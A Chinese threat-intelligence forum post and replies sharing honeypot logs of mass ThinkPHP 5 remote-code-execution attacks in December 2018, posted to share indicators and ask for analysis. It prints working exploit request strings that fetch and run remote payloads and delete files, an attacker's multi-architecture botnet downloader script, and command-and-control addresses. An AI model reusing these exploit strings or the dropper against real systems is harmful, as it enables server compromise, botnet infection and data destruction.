蜜罐捕获 web应用漏洞利用 求分析
批量thinkphp5的RCE漏洞利用
匿名用户 2018-12-22 22:03:09 829人浏览

蜜罐捕获攻击

212.237.14.55 - - [22/Dec/2018:13:17:50 +0800] "GET /public/index.php?s=/index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://142.93.197.215/sh;%20chmod%20777%20sh;%20./sh;%20rm%20-rf%20* HTTP/1.1" 404 162 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.23.1.el6.x86_64"

212.237.14.55 - - [22/Dec/2018:17:59:48 +0800] "GET /public/index.php?s=/index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://142.93.197.215/php;chmod%20777%20php;./php;rm%20-rf%20* HTTP/1.1" 404 162 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.23.1.el6.x86_64"


利用RCE获取远程服务器文件:

http://142.93.197.215/php

binarys="mips mpsl arm arm5 arm6 arm7 sh4 ppc x86 arc"
server_ip="142.93.197.215"
binname="Loliv3"
execname="LoliSecHoe"
for arch in $binarys
do
cd /tmp
wget http://$server_ip/$binname.$arch -O $execname
chmod 777 $execname
./$execname Think.php
rm -rf $execname
done

写入并执行

Loliv3.arc

Loliv3.arm

Loliv3.arm5

Loliv3.arm6

Loliv3.arm7

Loliv3.mips

Loliv3.mpsl

Loliv3.ppc

Loliv3.sh4

Loliv3.x86

php

连接Think.php

威胁指标(IOC)
ip地址(2) 威胁情报数目 开放端口 所属域名 相关样本 微步标签 < 1/1 >
Hash(1) 检测结果 关联样本 微步标签 打包价格:1 全部 < 1/1 >
匿名用户 2019-01-13 23:16:44 回复
没毛病速度太快了
golbin 2018-12-28 16:11:38 回复
感谢分享
匿名用户 2018-12-24 17:09:29 回复
nginx log: 2018-12-23T23:33:34+08:00 127.0.0.1 196.218.16.66 "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://cnc.junoland.xyz/bins/egg.x86;cat%20egg.x86%20>%20lzrd;chmod%20777%20lzrd;./lzrd%20thinkphp.x86 HTTP/1.1" - "-" "Sefa" 0.000
ping cnc.junoland.xyz
PING cnc.junoland.xyz (194.36.173.103) 56(84) bytes of data
不知道是不是同一个队伍的
匿名用户 2018-12-24 19:07:31 回复
感谢分享
匿名用户 2018-12-23 15:22:25 回复
黑客速度很快啊